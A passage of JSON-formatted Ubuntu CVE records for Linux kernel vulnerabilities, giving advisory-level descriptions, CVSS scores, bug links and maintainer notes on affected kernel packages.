in\nlib/lz4/lz4_decompress.c in the Linux kernel before 3.15.2, on 32-bit\nplatforms might allow context-dependent attackers to cause a denial of\nservice (memory corruption) or possibly have unspecified other impact via a\ncrafted Literal Run that would be improperly handled by programs not\ncomplying with an API limitation, a different vulnerability than\nCVE-2014-4715.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1335314>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 13.10 preview kernels android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.04 preview kernels \n[ebarretto](<https://launchpad.net/~ebarretto>) | commented out the packages that are old so we can have this CVE in active/ again.\n", "cvss3": {}, "published": "2014-07-03T00:00:00", "type": "ubuntucve", "title": "CVE-2014-4611", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-4611", "CVE-2014-4715"], "modified": "2014-07-03T00:00:00", "id": "UB:CVE-2014-4611", "href": "https://ubuntu.com/security/CVE-2014-4611", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-06-07T14:33:20", "description": "The offset2lib patch as used by the Linux Kernel contains a vulnerability,\nif RLIMIT_STACK is set to RLIM_INFINITY and 1 Gigabyte of memory is\nallocated (the maximum under the 1/4 restriction) then the stack will be\ngrown down to 0x80000000, and as the PIE binary is mapped above 0x80000000\nthe minimum distance between the end of the PIE binary's read-write segment\nand the start of the stack becomes small enough that the stack guard page\ncan be jumped over by an attacker. This affects Linux Kernel version\n4.11.5. This is a different issue than CVE-2017-1000370 and\nCVE-2017-1000365. This issue appears to be limited to i386 based systems.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[tyhicks](<https://launchpad.net/~tyhicks>) | The original offset2lib issue was not assigned a CVE and the fix is only in 15.04 (Vivid) and newer kernels.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-06-19T00:00:00", "type": "ubuntucve", "title": "CVE-2017-1000371", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000365", "CVE-2017-1000370", "CVE-2017-1000371"], "modified": "2017-06-19T00:00:00", "id": "UB:CVE-2017-1000371", "href": "https://ubuntu.com/security/CVE-2017-1000371", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T14:43:00", "description": "arch/arm64/mm/dma-mapping.c in the Linux kernel before 4.0.3, as used in\nthe ION subsystem in Android and other products, does not initialize\ncertain data structures, which allows local users to obtain sensitive\ninformation from kernel memory by triggering a dma_mmap call.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support \n[tyhicks](<https://launchpad.net/~tyhicks>) | specific to arm64 kernels\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2016-10-10T00:00:00", "type": "ubuntucve", "title": "CVE-2015-8950", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8950"], "modified": "2016-10-10T00:00:00", "id": "UB:CVE-2015-8950", "href": "https://ubuntu.com/security/CVE-2015-8950", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-07T14:39:25", "description": "Race condition in the ip4_datagram_release_cb function in\nnet/ipv4/datagram.c in the Linux kernel before 3.15.2 allows local users to\ngain privileges or cause a denial of service (use-after-free) by leveraging\nincorrect expectations about locking during multithreaded access to\ninternal data structures for IPv4 UDP sockets.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-02-07T00:00:00", "type": "ubuntucve", "title": "CVE-2014-9914", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-9914"], "modified": "2017-02-07T00:00:00", "id": "UB:CVE-2014-9914", "href": "https://ubuntu.com/security/CVE-2014-9914", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T14:52:48", "description": "The Direct Rendering Manager (DRM) subsystem in the Linux kernel through\n4.x mishandles requests for Graphics Execution Manager (GEM) objects, which\nallows context-dependent attackers to cause a denial of service (memory\nconsumption) via an application that processes graphics data, as\ndemonstrated by JavaScript code that creates many CANVAS elements for\nrendering by Chrome or Firefox.\n\n#### Bugs\n\n * <https://bugzilla.kernel.org/show_bug.cgi?id=60533>\n * <https://launchpad.net/bugs/1508323>\n * <https://bugs.freedesktop.org/show_bug.cgi?id=106136>\n * <https://gitlab.freedesktop.org/drm/intel/-/issues/110>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | no progress by upstream on fixing this.\n", "cvss3": {}, "published": "2015-10-16T00:00:00", "type": "ubuntucve", "title": "CVE-2013-7445", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7445"], "modified": "2015-10-16T00:00:00", "id": "UB:CVE-2013-7445", "href": "https://ubuntu.com/security/CVE-2013-7445", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-07T14:16:59", "description": "arch/arm64/kvm/guest.c in KVM in the Linux kernel before 4.18.12 on the\narm64 platform mishandles the KVM_SET_ON_REG ioctl. This is exploitable by\nattackers who can create virtual machines. An attacker can arbitrarily\nredirect the hypervisor flow of control (with full register control). An\nattacker can also cause a denial of service (hypervisor panic) via an\nillegal exception return. This occurs because of insufficient restrictions\non userspace access to the core register file, and because PSTATE.M\nvalidation does not prevent unintended execution modes.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.1, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2018-10-07T00:00:00", "type": "ubuntucve", "title": "CVE-2018-18021", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 3.6, "vectorString": "AV:L/AC:L/Au:N/C:N/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-18021"], "modified": "2018-10-07T00:00:00", "id": "UB:CVE-2018-18021", "href": "https://ubuntu.com/security/CVE-2018-18021", "cvss": {"score": 3.6, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2023-06-06T14:06:36", "description": "The sg_ioctl function in drivers/scsi/sg.c in the Linux kernel before\n4.13.4 allows local users to obtain sensitive information from\nuninitialized kernel heap-memory locations via an SG_GET_REQUEST_TABLE\nioctl call for /dev/sg0.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-10-03T00:00:00", "type": "ubuntucve", "title": "CVE-2017-14991", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-14991"], "modified": "2017-10-03T00:00:00", "id": "UB:CVE-2017-14991", "href": "https://ubuntu.com/security/CVE-2017-14991", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-06T14:11:58", "description": "The do_check function in kernel/bpf/verifier.c in the Linux kernel before\n4.11.1 does not make the allow_ptr_leaks value available for restricting\nthe output of the print_bpf_insn function, which allows local users to\nobtain sensitive address information via crafted bpf system calls.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2017-05-22T00:00:00", "type": "ubuntucve", "title": "CVE-2017-9150", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9150"], "modified": "2017-05-22T00:00:00", "id": "UB:CVE-2017-9150", "href": "https://ubuntu.com/security/CVE-2017-9150", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-04T14:18:13", "description": "The replace_map_fd_with_map_ptr function in kernel/bpf/verifier.c in the\nLinux kernel before 4.5.5 does not properly maintain an fd data structure,\nwhich allows local users to gain privileges or cause a denial of service\n(use-after-free) via crafted BPF instructions that reference an incorrect\nfile descriptor.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1578705>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support \n[sbeattie](<https://launchpad.net/~sbeattie>) | affects 4.4 kernels only introduced in 0246e64d9a5f, but made exploitable by 1be7f75d1668\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2016-05-05T00:00:00", "type": "ubuntucve", "title": "CVE-2016-4557", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4557"], "modified": "2016-05-05T00:00:00", "id": "UB:CVE-2016-4557", "href": "https://ubuntu.com/security/CVE-2016-4557", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T14:50:52", "description": "Use-after-free vulnerability in net/unix/af_unix.c in the Linux kernel\nbefore 4.3.3 allows local users to bypass intended AF_UNIX socket\npermissions or cause a denial of service (panic) via crafted epoll_ctl\ncalls.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1517951>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.2}, "published": "2015-12-28T00:00:00", "type": "ubuntucve", "title": "CVE-2013-7446", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "PARTIAL", "baseScore": 5.4, "vectorString": "AV:L/AC:M/Au:N/C:N/I:P/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 7.8, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7446"], "modified": "2015-12-28T00:00:00", "id": "UB:CVE-2013-7446", "href": "https://ubuntu.com/security/CVE-2013-7446", "cvss": {"score": 5.4, "vector": "AV:L/AC:M/Au:N/C:N/I:P/A:C"}}, {"lastseen": "2023-06-07T14:47:09", "description": "The WLAN (aka Wi-Fi) driver for the Linux kernel 3.x and 4.x, as used in\nQualcomm Innovation Center (QuIC) Android contributions for MSM devices and\nother products, does not verify authorization for private SET IOCTL calls,\nwhich allows attackers to gain privileges via a crafted application,\nrelated to wlan_hdd_hostapd.c and wlan_hdd_wext.c.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1580365>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.10 and earlier preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-05-09T00:00:00", "type": "ubuntucve", "title": "CVE-2015-0571", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0571"], "modified": "2016-05-09T00:00:00", "id": "UB:CVE-2015-0571", "href": "https://ubuntu.com/security/CVE-2015-0571", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-07T15:03:45", "description": "Stack consumption vulnerability in the parse_rock_ridge_inode_internal\nfunction in fs/isofs/rock.c in the Linux kernel through 3.16.1 allows local\nusers to cause a denial of service (uncontrolled recursion, and system\ncrash or reboot) via a crafted iso9660 image with a CL entry referring to a\ndirectory entry that has a CL entry.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1362447>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels (flo, goldfish, grouper, maguro, mako and manta) are not supported on the Ubuntu Touch 14.04 preview kernels linux-lts-saucy no longer receives official support linux-lts-quantal no longer receives official support\n", "cvss3": {}, "published": "2014-08-31T00:00:00", "type": "ubuntucve", "title": "CVE-2014-5471", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 1.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:L/AC:H/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-5471"], "modified": "2014-08-31T00:00:00", "id": "UB:CVE-2014-5471", "href": "https://ubuntu.com/security/CVE-2014-5471", "cvss": {"score": 4.0, "vector": "AV:L/AC:H/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-06T14:38:22", "description": "The Linux kernel before 3.12.4 updates certain length values before\nensuring that associated data structures have been initialized, which\nallows local users to obtain sensitive information from kernel stack memory\nvia a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call, related to\nnet/ipv4/ping.c, net/ipv4/raw.c, net/ipv4/udp.c, net/ipv6/raw.c, and\nnet/ipv6/udp.c.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1267075>\n", "cvss3": {}, "published": "2014-01-06T00:00:00", "type": "ubuntucve", "title": "CVE-2013-7263", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7263"], "modified": "2014-01-06T00:00:00", "id": "UB:CVE-2013-7263", "href": "https://ubuntu.com/security/CVE-2013-7263", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-06-07T14:51:53", "description": "The KVM subsystem in the Linux kernel through 4.2.6, and Xen 4.3.x through\n4.6.x, allows guest OS users to cause a denial of service (host OS panic or\nhang) by triggering many #DB (aka Debug) exceptions, related to svm.c.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1520184>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[sbeattie](<https://launchpad.net/~sbeattie>) | for linux kernel, only affects AMD processors (svm)\n", "cvss3": {}, "published": "2015-11-16T00:00:00", "type": "ubuntucve", "title": "CVE-2015-8104", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-8104"], "modified": "2015-11-16T00:00:00", "id": "UB:CVE-2015-8104", "href": "https://ubuntu.com/security/CVE-2015-8104", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-07T14:21:41", "description": "The cdrom_ioctl_media_changed function in drivers/cdrom/cdrom.c in the\nLinux kernel before 4.16.6 allows local attackers to use a incorrect bounds\ncheck in the CDROM driver CDROM_MEDIA_CHANGED ioctl to read out kernel\nmemory.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.5, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2018-05-09T00:00:00", "type": "ubuntucve", "title": "CVE-2018-10940", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10940"], "modified": "2018-05-09T00:00:00", "id": "UB:CVE-2018-10940", "href": "https://ubuntu.com/security/CVE-2018-10940", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2023-06-07T14:30:53", "description": "Race condition in fs/timerfd.c in the Linux kernel before 4.10.15 allows\nlocal users to gain privileges or cause a denial of service (list\ncorruption or use-after-free) via simultaneous file-descriptor operations\nthat leverage improper might_cancel queueing.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-08-19T00:00:00", "type": "ubuntucve", "title": "CVE-2017-10661", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-10661"], "modified": "2017-08-19T00:00:00", "id": "UB:CVE-2017-10661", "href": "https://ubuntu.com/security/CVE-2017-10661", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T14:04:13", "description": "The usb_destroy_configuration function in drivers/usb/core/config.c in the\nUSB core subsystem in the Linux kernel through 4.14.5 does not consider the\nmaximum number of configurations and interfaces before attempting to\nrelease resources, which allows local users to cause a denial of service\n(out-of-bounds write access) or possibly have unspecified other impact via\na crafted USB device.", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "ubuntucve", "title": "CVE-2017-17558", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-17558"], "modified": "2017-12-12T00:00:00", "id": "UB:CVE-2017-17558", "href": "https://ubuntu.com/security/CVE-2017-17558", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-04T14:19:32", "description": "fs/pipe.c in the Linux kernel before 4.5 does not limit the amount of\nunread data in pipes, which allows local users to cause a denial of service\n(memory consumption) by creating many pipes with non-default sizes.\n\n#### Bugs\n\n * <https://launchpad.net/bugs/1554260>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[jdstrand](<https://launchpad.net/~jdstrand>) | android kernels 